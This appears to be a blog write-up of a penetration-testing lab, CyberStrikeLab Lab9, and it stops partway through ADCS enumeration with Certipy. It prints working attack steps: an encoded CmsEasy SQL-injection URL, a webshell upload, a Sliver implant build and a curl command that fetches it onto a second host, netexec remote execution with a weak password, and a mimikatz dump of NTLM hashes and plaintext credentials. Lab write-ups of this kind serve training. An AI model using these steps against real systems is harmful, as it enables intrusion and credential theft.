当前位置：首页 > news >正文

CyberStrikeLab-Lab9-WriteUp

news 来源：原创 2025/5/24 7:25:43

Lab9

入口-172.5.33.6

172.5.33.6

❯ gogo -i 172.5.33.6 -p all -ev
[*] gogo: , 2025-05-22 14:10.48
[*] Current goroutines: 1000, Version Level: 1,Exploit: auto, PortSpray: false , 2025-05-22 14:10.48
[*] Start task 172.5.33.6 ,total ports: 368 , mod: default , 2025-05-22 14:10.48
[*] too much ports , only show top 100 ports: 8017,9095,8099,7010,11210,442,6001,8004,4848,8014,8763,10001,7005,8092,7000,8002,8007,3873,20882,7007,2379,9300,81,444,8000,7001,icmp,16201,22,84,8070,8880,8873,9990,8870,9097,8024,6984,33066,7890,9092,8222,23,50020,4430,8003,9443,15011,8300,9000,8015,9081,8878,9096,8899,10022,18090,11211,1001,7443,8765,8093,16000,winrm,901,70,3001,8012,5005,10250,13389,83,8091,27019,8085,8881,18088,8887,4443,8848,10002,143,8096,5672,10255,1099,21,2100,80,9004,1435,8087,7080,9094,9070,8882,443,1080,5601,1311...... , 2025-05-22 14:10.48
[*] Default Scan is expected to take 4 seconds , 2025-05-22 14:10.48
[+] winrm://172.5.33.6:5985		winrm:Windows 10 1607/Server2016(10.0.14393):default	WIN-784BAKDI0AC/WIN-784BAKDI0AC [winrm] WIN-784BAKDI0AC/WIN-784BAKDI0AC
[+] wmi://172.5.33.6:135		wmi:default	/ [wmi] /
[+] http://172.5.33.6:80	Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02	poweredby:php/5.6.9||php||mod_fcgid	 [200] HTTP/1.1 200
[+] tcp://172.5.33.6:3306		mysql:guess	 [open]
[*] Alived: 4, Total: 368 , 2025-05-22 14:11.00
[*] Time consuming: 12.361886167s , 2025-05-22 14:11.00

80-CmsEasy

在这里插入图片描述

CmsEasy
在这里插入图片描述

在这里插入图片描述

v.7753

对应官网文件

https://www.cmseasy.cn/published/show-1596.html

<?php
# CmsEasy Enterprise Content Management System
# Copyright (C) CmsEasy Co.,Ltd (https://www.CmsEasy.cn). All rights reserved.
define('_VERSION','7_7_5_20211012_UTF8');
define('_VERNUM','7.7.5.20211012');
define('_VERCODE','7753');# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) CmsEasy Co., Ltd. (https://www.CmsEasy.cn). All rights reserved.

任意文件写入

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞/#安装包下载

但是这是一个后台洞，得先登陆

sql注入

https://github.com/MzzdToT/CmsEasy_sql/blob/main/cmseasy_sql_scan.py

http://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5

访问这个路径

{"userid":"1","username":"admin","password":"a66abb5684c45962d887564f08346e8d","nickname":"\u7ba1\u7406\u5458","groupid":"2","checked":"1","qqlogin":"","alipaylogin":"","wechatlogin":"","avatar":"","userip":"","state":"0","qq":"1111","e_mail":"admin@qq.com","address":"admin","tel":"admin","question":"","answer":"","intro":"","point":"0","introducer":"0","regtime":"0","sex":"","isblock":"0","isdelete":"0","headimage":"\/html\/upload\/images\/201907\/15625455867367.png","integration":"0","couponidnum":"17:0:1","collect":"2,4,3,46,14,73","menoy":"100.07","adddatetime":"2021-09-01 00:00:00","notifiid":"","templatelang":"cn","adminlang":"cn","buyarchive":"","adminlangdomain":"","templatelangdomain":"","expired_time":"0"}

拿到了密码md5

a66abb5684c45962d887564f08346e8d:admin123456

admin123456 - -好吧还是弱口令。。
在这里插入图片描述

成功写入文件

webshell

在这里插入图片描述

tasklist /svc 看了一下啊没有杀软

config

sliver (lab9) > cat config_database.php<?php if (!defined('ROOT')) exit('Can\'t Access !'); return array ('database'=>array(
'hostname'=>'localhost',//MySQL服务器
'database'=>'eyou',//数据库名
'user'=>'eyou',//数据库用户名
'password'=>'cyberstrike@2024',//数据库密码
'prefix'=>'cmseasy_',//数据库表前缀
'encoding'=>'utf8',//编码
'type' => 'mysqli',//数据库类型
),);sliver (lab9) > pwd[*] C:\phpstudy_pro\WWW\config

flag1

sliver (lab9) > cat c:/flag.txt[*] Supplied pattern c:/flag.txt matched file c:\flag.txtgo-flag{8ECCA5CC1}

第二个网段-10.6.6.10

sliver (lab9) > ifconfig+--------------------------------------+
| 以太网实例 2                         |
+--------------------------------------+
| # | IP Addresses | MAC Address       |
+---+--------------+-------------------+
| 2 | 10.6.6.10/24 | a0:0c:91:78:30:0d |
+--------------------------------------++----------------------------------------+
| 以太网实例 1                           |
+----------------------------------------+
|  # | IP Addresses  | MAC Address       |
+----+---------------+-------------------+
| 11 | 172.5.33.6/24 | 80:98:cb:ad:6d:db |
+----------------------------------------+3 adapters not shown.

fscan-端口扫描

PS C:\phpstudy_pro\WWW\config> .\fscan2.exe -h 10.6.6.10/24 -p 1-65535
.\fscan2.exe -h 10.6.6.10/24 -p 1-65535___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 1-65535
[*] 开始信息扫描...
[*] CIDR范围: 10.6.6.0-10.6.6.255
[*] 已生成IP范围: 10.6.6.0 - 10.6.6.255
[*] 已解析CIDR 10.6.6.10/24 -> IP范围 10.6.6.0-10.6.6.255
[*] 最终有效主机数量: 256
[+] 目标 10.6.6.10       存活 (ICMP)
[+] 目标 10.6.6.55       存活 (ICMP)
[+] 目标 10.6.6.88       存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 65535 个有效端口
[+] 端口开放 10.6.6.88:139
[+] 端口开放 10.6.6.55:139
[+] 端口开放 10.6.6.10:139
[+] 端口开放 10.6.6.88:135
[+] 端口开放 10.6.6.55:135
[+] 端口开放 10.6.6.10:135
[+] 端口开放 10.6.6.55:88
[+] 端口开放 10.6.6.55:80
[+] 端口开放 10.6.6.10:80
[+] 端口开放 10.6.6.55:53
[+] 端口开放 10.6.6.55:389
[+] 端口开放 10.6.6.10:445
[+] 端口开放 10.6.6.55:445
[+] 端口开放 10.6.6.88:445
[+] 端口开放 10.6.6.55:464
[+] 端口开放 10.6.6.55:593
[+] 端口开放 10.6.6.55:636
[+] 端口开放 10.6.6.55:3268
[+] 端口开放 10.6.6.55:3269
[+] 端口开放 10.6.6.10:3306
[+] 端口开放 10.6.6.88:3389
[+] 端口开放 10.6.6.10:5985
[+] 端口开放 10.6.6.88:5985
[+] 端口开放 10.6.6.55:5985
[+] 端口开放 10.6.6.55:9389

PS C:\phpstudy_pro\WWW\config> .\fscan2.exe -h 10.6.6.10/24 -o 10.txt
.\fscan2.exe -h 10.6.6.10/24 -o 10.txt___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.6.6.0-10.6.6.255
[*] 已生成IP范围: 10.6.6.0 - 10.6.6.255
[*] 已解析CIDR 10.6.6.10/24 -> IP范围 10.6.6.0-10.6.6.255
[*] 最终有效主机数量: 256
[+] 目标 10.6.6.10       存活 (ICMP)
[+] 目标 10.6.6.55       存活 (ICMP)
[+] 目标 10.6.6.88       存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 10.6.6.10:3306
[+] 端口开放 10.6.6.88:445
[+] 端口开放 10.6.6.55:445
[+] 端口开放 10.6.6.10:445
[+] 端口开放 10.6.6.88:139
[+] 端口开放 10.6.6.55:139
[+] 端口开放 10.6.6.10:139
[+] 端口开放 10.6.6.88:135
[+] 端口开放 10.6.6.55:135
[+] 端口开放 10.6.6.10:135
[+] 端口开放 10.6.6.55:88
[+] 端口开放 10.6.6.55:80
[+] 端口开放 10.6.6.10:80
[+] 存活端口数量: 13
[*] 开始漏洞扫描...
[!] 扫描错误 10.6.6.10:3306 - Error 1130: Host 'WIN-784BAKDI0AC' is not allowed to connect to this MySQL server
[*] NetInfo
[*] 10.6.6.55[->] DC[->] 10.6.6.55
[*] NetInfo
[*] 10.6.6.10[->] WIN-784BAKDI0AC[->] 172.5.33.6[->] 10.6.6.10
[*] 网站标题 http://10.6.6.10          状态码:200 长度:77272  标题:中文网页标题
[!] 扫描错误 10.6.6.10:445 - 无法确定目标是否存在漏洞
[*] NetInfo
[*] 10.6.6.88[->] cyberweb[->] 10.6.6.88
[!] 扫描错误 10.6.6.55:139 - netbios error
[!] 扫描错误 10.6.6.55:88 - Get "http://10.6.6.55:88": read tcp 10.6.6.10:49285->10.6.6.55:88: wsarecv: An existing connection was forcibly closed by the remote host.
[*] OsInfo 10.6.6.55	(Windows Server 2016 Standard 14393)
[!] 扫描错误 10.6.6.10:139 - netbios error
[!] 扫描错误 10.6.6.55:80 - Get "http://10.6.6.55": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[*] OsInfo 10.6.6.88	(Windows Server 2016 Standard 14393)
[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393[+] 扫描已完成: 13/13
[*] 扫描结束,耗时: 1m20.5048977s

PS C:\phpstudy_pro\WWW\config> cat result.txt
cat result.txt
[+] 绔彛寮€鏀?10.6.6.88:139
[+] 绔彛寮€鏀?10.6.6.55:139
[+] 绔彛寮€鏀?10.6.6.10:139
[+] 绔彛寮€鏀?10.6.6.88:135
[+] 绔彛寮€鏀?10.6.6.55:135
[+] 绔彛寮€鏀?10.6.6.10:135
[+] 绔彛寮€鏀?10.6.6.55:88
[+] 绔彛寮€鏀?10.6.6.55:80
[+] 绔彛寮€鏀?10.6.6.10:80
[+] 绔彛寮€鏀?10.6.6.55:53
[+] 绔彛寮€鏀?10.6.6.55:389
[+] 绔彛寮€鏀?10.6.6.10:445
[+] 绔彛寮€鏀?10.6.6.55:445
[+] 绔彛寮€鏀?10.6.6.88:445
[+] 绔彛寮€鏀?10.6.6.55:464
[+] 绔彛寮€鏀?10.6.6.55:593
[+] 绔彛寮€鏀?10.6.6.55:636
[+] 绔彛寮€鏀?10.6.6.55:3268
[+] 绔彛寮€鏀?10.6.6.55:3269
[+] 绔彛寮€鏀?10.6.6.10:3306
[+] 绔彛寮€鏀?10.6.6.88:3389
[+] 绔彛寮€鏀?10.6.6.10:5985
[+] 绔彛寮€鏀?10.6.6.88:5985
[+] 绔彛寮€鏀?10.6.6.55:5985
[+] 绔彛寮€鏀?10.6.6.55:9389
[+] 绔彛寮€鏀?10.6.6.10:47001
[+] 绔彛寮€鏀?10.6.6.88:47001
[+] 绔彛寮€鏀?10.6.6.88:49664
[+] 绔彛寮€鏀?10.6.6.10:49665
[+] 绔彛寮€鏀?10.6.6.10:49664
[+] 绔彛寮€鏀?10.6.6.55:49670
[+] 绔彛寮€鏀?10.6.6.10:49670
[+] 绔彛寮€鏀?10.6.6.88:49669
[+] 绔彛寮€鏀?10.6.6.55:49669
[+] 绔彛寮€鏀?10.6.6.10:49669
[+] 绔彛寮€鏀?10.6.6.88:49668
[+] 绔彛寮€鏀?10.6.6.55:49668
[+] 绔彛寮€鏀?10.6.6.55:49667
[+] 绔彛寮€鏀?10.6.6.10:49668
[+] 绔彛寮€鏀?10.6.6.88:49667
[+] 绔彛寮€鏀?10.6.6.10:49667
[+] 绔彛寮€鏀?10.6.6.88:49666
[+] 绔彛寮€鏀?10.6.6.10:49666
[+] 绔彛寮€鏀?10.6.6.88:49665
[+] 绔彛寮€鏀?10.6.6.55:49680
[+] 绔彛寮€鏀?10.6.6.88:49671
[+] 绔彛寮€鏀?10.6.6.55:49671
[+] 绔彛寮€鏀?10.6.6.88:49670
[+] 绔彛寮€鏀?10.6.6.55:49708
[+] 绔彛寮€鏀?10.6.6.55:49725
[*] NetInfo
[*] 10.6.6.10[->] WIN-784BAKDI0AC[->] 172.5.33.6[->] 10.6.6.10
[*] 缃戠珯鏍囬 http://10.6.6.10          鐘舵€佺爜:200 闀垮害:77272  鏍囬:涓枃缃戦〉鏍囬
[*] NetInfo
[*] 10.6.6.55[->] DC[->] 10.6.6.55
[*] NetInfo
[*] 10.6.6.88[->] cyberweb[->] 10.6.6.88
[*] 缃戠珯鏍囬 http://10.6.6.55          鐘舵€佺爜:200 闀垮害:703    鏍囬:IIS Windows Server
[*] 缃戠珯鏍囬 http://10.6.6.88:5985     鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found
[*] 缃戠珯鏍囬 http://10.6.6.88:47001    鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found
[*] 缃戠珯鏍囬 http://10.6.6.55:5985     鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found
[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393
[*] OsInfo 10.6.6.55	(Windows Server 2016 Standard 14393)
[*] OsInfo 10.6.6.88	(Windows Server 2016 Standard 14393)
[+] [鍙戠幇婕忔礊] 鐩爣: http://10.6.6.55婕忔礊绫诲瀷: poc-yaml-active-directory-certsrv-detect婕忔礊鍚嶇О:璇︾粏淇℃伅: %!s(<nil>)
[*] 缃戠珯鏍囬 http://10.6.6.10:5985     鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found
[*] 缃戠珯鏍囬 http://10.6.6.10:47001    鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found
[+] RDP 10.6.6.88:3389:administrator qwe123!@#

注意有adcs

cyberstrikelab.com

cyberweb - 10.6.6.88

rdp -弱口令

本地账户密码

10.6.6.88:3389:administrator qwe123!@#

直接开代理

sliver (lab9) > socks5 start[*] Started SOCKS5 127.0.0.1 1081
⚠️  In-band SOCKS proxies can be a little unstable depending on protocol

❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'whoami'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         cyberweb\administrator

v-v Microsoft Remote_desktop 一直连不上只能用命令行了

flag2

❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'dir c:\'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         ╟²╢»╞≈ C ╓╨╡─╛φ├╗╙╨▒Ω╟⌐íú
SMB         10.6.6.88       445    CYBERWEB         ╛φ╡─╨≥┴╨║┼╩╟ F667-4B31
SMB         10.6.6.88       445    CYBERWEB         c:\ ╡──┐┬╝
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:36                45 flag.txt
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:55    <DIR>          PerfLogs
SMB         10.6.6.88       445    CYBERWEB         2018/02/03  03:38    <DIR>          Program Files
SMB         10.6.6.88       445    CYBERWEB         2016/07/16  21:23    <DIR>          Program Files (x86)
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:58    <DIR>          smb
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:07    <DIR>          Users
SMB         10.6.6.88       445    CYBERWEB         2025/02/19  18:11    <DIR>          Windows
SMB         10.6.6.88       445    CYBERWEB         1 ╕÷╬─╝■             45 ╫╓╜┌
SMB         10.6.6.88       445    CYBERWEB         6 ╕÷─┐┬╝ 31,290,617,856 ┐╔╙├╫╓╜┌
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'type c:\flag.txt'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         go-flag{0A43311646}

pivots

sliver (lab9) > pivotsID   Protocol   Bind Address   Number Of Pivots
==== ========== ============== ==================1   TCP        0.0.0.0:9898                  0sliver (lab9) > background[*] Background ...sliver > generate --tcp-pivot 10.6.6.10:9898 --os windows[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 16s
[*] Implant saved to /Users/a/Desktop/tool/sliver/LARGE_POWER.exe

弄个踏板，上线 cyberweb

本来想用smb上传马子，但是走代理后不稳定，一直传不上

通过10.6.6.10web传了

❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'curl 10.6.6.10/LARGE_POWER.exe -o  c:\smb\LARGE_POWER.exe'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         'curl' ▓╗╩╟─┌▓┐╗≥═Γ▓┐├ⁿ┴εú¼╥▓▓╗╩╟┐╔╘╦╨╨╡─│╠╨≥
SMB         10.6.6.88       445    CYBERWEB         ╗≥┼·┤ª└φ╬─╝■íú

传上去还是回连不了- -

mimikatz

用wmiexec 执行了 mimikatz了

c:\smb>mimikatz.exe "sekurlsa::debug " "sekurlsa::logonpasswords" "exit"> pssword.txt.#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ##       > http://blog.gentilkiwi.com/mimikatz'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )'#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/mimikatz(commandline) # sekurlsa::debug
ERROR mimikatz_doLocal ; "debug" command of "sekurlsa" module not found !Module :	sekurlsa
Full name :	SekurLSA module
Description :	Some commands to enumerate credentials...msv  -  Lists LM & NTLM credentialswdigest  -  Lists WDigest credentialskerberos  -  Lists Kerberos credentialstspkg  -  Lists TsPkg credentialslivessp  -  Lists LiveSSP credentialsssp  -  Lists SSP credentialslogonPasswords  -  Lists all available providers credentialsprocess  -  Switch (or reinit) to LSASS process  contextminidump  -  Switch (or reinit) to LSASS minidump contextpth  -  Pass-the-hashkrbtgt  -  krbtgt!dpapisystem  -  DPAPI_SYSTEM secrettrust  -  Antisocialbackupkeys  -  Preferred Backup Master keystickets  -  List Kerberos ticketsekeys  -  List Kerberos Encryption Keysdpapi  -  List Cached MasterKeyscredman  -  List Credentials Managermimikatz(commandline) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 1780709 (00000000:001b2be5)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 16:58:36
SID               : S-1-5-90-0-3msv :[00000003] Primary* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8* SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : CYBERWEB$* Domain   : cyberstrikelab.com* Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 1780585 (00000000:001b2b69)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 16:58:36
SID               : S-1-5-90-0-3msv :[00000003] Primary* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8* SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : CYBERWEB$* Domain   : cyberstrikelab.com* Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 51034 (00000000:0000c75a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:15
SID               : S-1-5-90-0-1msv :[00000003] Primary* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8* SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : CYBERWEB$* Domain   : cyberstrikelab.com* Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CYBERWEB$
Domain            : CYBERSTRIKELAB
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:09
SID               : S-1-5-20msv :[00000003] Primary* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8* SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : cyberweb$* Domain   : CYBERSTRIKELAB.COM* Password : (null)ssp :credman :Authentication Id : 0 ; 306483 (00000000:0004ad33)
Session           : Interactive from 0
User Name         : cslab
Domain            : CYBERSTRIKELAB
Logon Server      : DC
Logon Time        : 2025/5/22 15:31:45
SID               : S-1-5-21-4286488488-1212600890-1604239976-1104msv :[00000003] Primary* Username : cslab* Domain   : CYBERSTRIKELAB* NTLM     : 39b0e84f13872f51efb3b8ba5018c517* SHA1     : fa6a465532224cc4f1fa5094424bf219d25b7463* DPAPI    : 432dfb0f990f2cc292b2fd09468aab5etspkg :wdigest :* Username : cslab* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : cslab* Domain   : CYBERSTRIKELAB.COM* Password : (null)ssp :credman :Authentication Id : 0 ; 131588 (00000000:00020204)
Session           : Interactive from 1
User Name         : Administrator
Domain            : CYBERWEB
Logon Server      : CYBERWEB
Logon Time        : 2025/5/22 7:29:19
SID               : S-1-5-21-332097019-2215467117-1557799732-500msv :[00000003] Primary* Username : Administrator* Domain   : CYBERWEB* NTLM     : c377ba8a4dd52401bc404dbe49771bbc* SHA1     : d9ac14100bf4e36f6807dd3c29051983b2d58d3dtspkg :wdigest :* Username : Administrator* Domain   : CYBERWEB* Password : (null)kerberos :* Username : Administrator* Domain   : CYBERWEB* Password : (null)ssp :credman :Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:16
SID               : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain   : (null)* Password : (null)kerberos :* Username : (null)* Domain   : (null)* Password : (null)ssp :credman :Authentication Id : 0 ; 51057 (00000000:0000c771)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:15
SID               : S-1-5-90-0-1msv :[00000003] Primary* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8* SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : CYBERWEB$* Domain   : cyberstrikelab.com* Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 23220 (00000000:00005ab4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:06
SID               :msv :[00000003] Primary* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8* SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :kerberos :ssp :credman :Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CYBERWEB$
Domain            : CYBERSTRIKELAB
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:05
SID               : S-1-5-18msv :tspkg :wdigest :* Username : CYBERWEB$* Domain   : CYBERSTRIKELAB* Password : (null)kerberos :* Username : cyberweb$* Domain   : CYBERSTRIKELAB.COM* Password : (null)ssp :credman :mimikatz(commandline) # exit
Bye!

拿到了一个域用户 cslab的ntlm hash

cslab : 39b0e84f13872f51efb3b8ba5018c517

dc - 10.6.6.55

bloodhound

❯ netexec ldap 10.6.6.55 -u cslab -H 39b0e84f13872f51efb3b8ba5018c517   --bloodhound -c All  --dns-server 10.6.6.55  --dns-tcp
SMB         10.6.6.55       445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
LDAP        10.6.6.55       389    DC               [+] cyberstrikelab.com\cslab:39b0e84f13872f51efb3b8ba5018c517
LDAP        10.6.6.55       389    DC               Resolved collection methods: container, localadmin, acl, group, psremote, objectprops, dcom, rdp, trusts, session
[19:52:14] ERROR    Unhandled exception in computer DC.cyberstrikelab.com processing: The NETBIOS connection with the remote host timed out.                      computers.py:270
LDAP        10.6.6.55       389    DC               Done in 00M 58S
LDAP        10.6.6.55       389    DC               Compressing output into /Users/a/.nxc/logs/DC_10.6.6.55_2025-05-22_195130_bloodhound.zip

没什么特别的

certipy

前面fscan扫描的时候注意到域内存在ADCS

❯ certipy find -vuln  -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)[+] Authenticating to LDAP server
[+] Bound to ldaps://10.6.6.55:636 - ssl
[+] Default path: DC=cyberstrikelab,DC=com
[+] Configuration path: CN=Configuration,DC=cyberstrikelab,DC=com
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:CYBERSTRIKELAB.COM\Domain Computers (S-1-5-21-4286488488-1212600890-1604239976-515)CYBERSTRIKELAB.COM\Everyone (CYBERSTRIKELAB.COM-S-1-1-0)CYBERSTRIKELAB.COM\Users (CYBERSTRIKELAB.COM-S-1-5-32-545)CYBERSTRIKELAB.COM\Authenticated Users (CYBERSTRIKELAB.COM-S-1-5-11)CYBERSTRIKELAB.COM\Domain Users (S-1-5-21-4286488488-1212600890-1604239976-513)CYBERSTRIKELAB.COM\cslab (S-1-5-21-4286488488-1212600890-1604239976-1104)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.cyberstrikelab.com' at '10.6.6.55'
[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA
